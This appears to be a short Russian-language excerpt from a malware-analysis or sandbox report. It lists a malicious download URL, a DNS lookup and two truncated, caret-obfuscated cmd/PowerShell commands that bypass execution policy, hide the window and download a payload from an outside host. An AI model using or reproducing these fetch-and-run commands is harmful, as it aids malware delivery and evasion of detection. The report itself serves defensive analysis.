Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWErS^HEL^L^.^exe -exE^c^UTiONPol^IC^Y Bypass^ ^-N^OP^R^o^fiL^E^ -^W^i^NdOWs^t^y^l^e^ H^Idde^n (n^E^w^-^oBjECT syst^eM.net.^W^EBClIENt)^.DoW^n^L^oADFIlE('http://www.voper...
- DNS ASK vo###gooda.top
- '<SYSTEM32>\cmd.exe' /C "pOWErS^HEL^L^.^exe -exE^c^UTiONPol^IC^Y Bypass^ ^-N^OP^R^o^fiL^E^ -^W^i^NdOWs^t^y^l^e^ H^Idde^n (n^E^w^-^oBjECT syst^eM.net.^W^EBClIENt)^.DoW^n^L^oADFIlE('http://www.voper...' (со скрытым окном)